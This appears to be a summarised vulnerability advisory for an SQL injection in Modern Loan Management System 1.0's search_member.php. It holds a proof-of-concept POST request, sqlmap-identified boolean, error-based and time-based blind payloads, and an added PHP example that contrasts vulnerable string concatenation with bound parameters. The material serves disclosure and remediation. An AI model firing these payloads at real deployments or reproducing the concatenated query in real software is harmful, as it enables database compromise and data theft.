From this webpage screenshot, the following key information about the vulnerability can be obtained:

1. **Vulnerability Title**: SQL injection in Modern Loan management system 1.0
2. **Date**: September 21, 2024
3. **Vendor Homepage**: https://www.sourcecodester.com/users/mayurik
4. **Software Link**: https://www.sourcecodester.com/php/14570/modern-loan-management-system-project-phpmysql-full-source-code.html
5. **Version**: 1.0
6. **Description**: The `searchMember` function developed in Modern Loan Management System, located in the `search_member.php` file, contains an SQL injection vulnerability.
7. **Test Environment**: Windows 10 + Apache + MySQL + PHP 5.4.45
8. **POC** (Proof of Concept):
   - **POST Request Example**:

     ```
     POST /CVE/admin/index.php?page=search_member HTTP/1.1
     Content-Type: application/x-www-form-urlencoded
     X-Requested-With: XMLHttpRequest
     Cookie: PHPSESSID=lp2f9spshgfvq15min3jn6fr23
     Content-Length: 79
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Encoding: gzip, deflate, br
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
     Host: 127.0.0.1
     Connection: Keep-alive

     searchMember=1*&sub=Search%20Member
     ```

   - **SQLmap Identified Injection Points**:

     ```
     sqlmap identified the following injection point(s) with a total of 259 HTTP(s) requests:
     ```

     ```
     Parameter: #1* (custom) POST
         Type: boolean-based blind
         Title: AND boolean-based blind - WHERE or HAVING clause
         Payload: searchMember=1' AND 6653=6653 AND 'MRIN'=MRIN&sub=Search Member
     ```

     ```
         Type: error-based
         Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
         Payload: searchMember=1' AND ROW(7902,9590)>(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(7902=7902,1))),0x7166766271,FLOOR(RAND(0)*2))x FROM (SELECT 9320 UNION SELECT 3819 UNION SELECT 9777 UNION SELECT 6003)a GROUP BY x) AND 'AOku'=AOku&sub=Search Member
     ```

     ```
         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: searchMember=1' AND (SELECT 3824 FROM (SELECT(SLEEP(5)))mqcw) AND 'QBJY'=QBJY&sub=Search Member
     ```

This information provides a detailed description of the vulnerability's nature, scope of impact, and how it can be exploited.
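
The remediation for this class of bug, as an added example that is not code from the project or the advisory: it runs the same lookup once with the request value concatenated into the SQL text and once with the value bound as a parameter. The page does not show the source of `search_member.php`, so the `member` table, its columns and both function names are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example. Schema and function names are hypothetical; SQLite in
// memory stands in for the application's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE member (member_no TEXT PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO member VALUES ('1', 'Constructed Member A')");
$db->exec("INSERT INTO member VALUES ('2', 'Constructed Member B')");

// Vulnerable pattern: the request value becomes part of the SQL text.
function searchMemberConcat(PDO $db, $term)
{
    $sql = "SELECT member_no, name FROM member WHERE member_no = '" . $term . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the value is bound as data and is never parsed as SQL.
function searchMemberBound(PDO $db, $term)
{
    $stmt = $db->prepare("SELECT member_no, name FROM member WHERE member_no = :term");
    $stmt->bindValue(':term', $term, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal lookup, a value carrying an extra boolean
// condition (same shape as the sqlmap boolean-based test), and a value with
// a lone apostrophe.
$inputs = array(
    'plain'      => "1",
    'condition'  => "1' AND 6653=6653 AND 'MRIN'='MRIN",
    'apostrophe' => "1'",
);

foreach ($inputs as $label => $term) {
    try {
        $concat = count(searchMemberConcat($db, $term)) . " row(s)";
    } catch (PDOException $e) {
        $concat = "SQL error"; // input broke the statement's syntax
    }
    $bound = count(searchMemberBound($db, $term)) . " row(s)";
    printf("%-10s concat: %-9s bound: %s\n", $label, $concat, $bound);
}
```

A regression test for the fix should check that the `condition` and `apostrophe` inputs return no rows and raise no SQL error from the bound version, since both are then compared as literal strings.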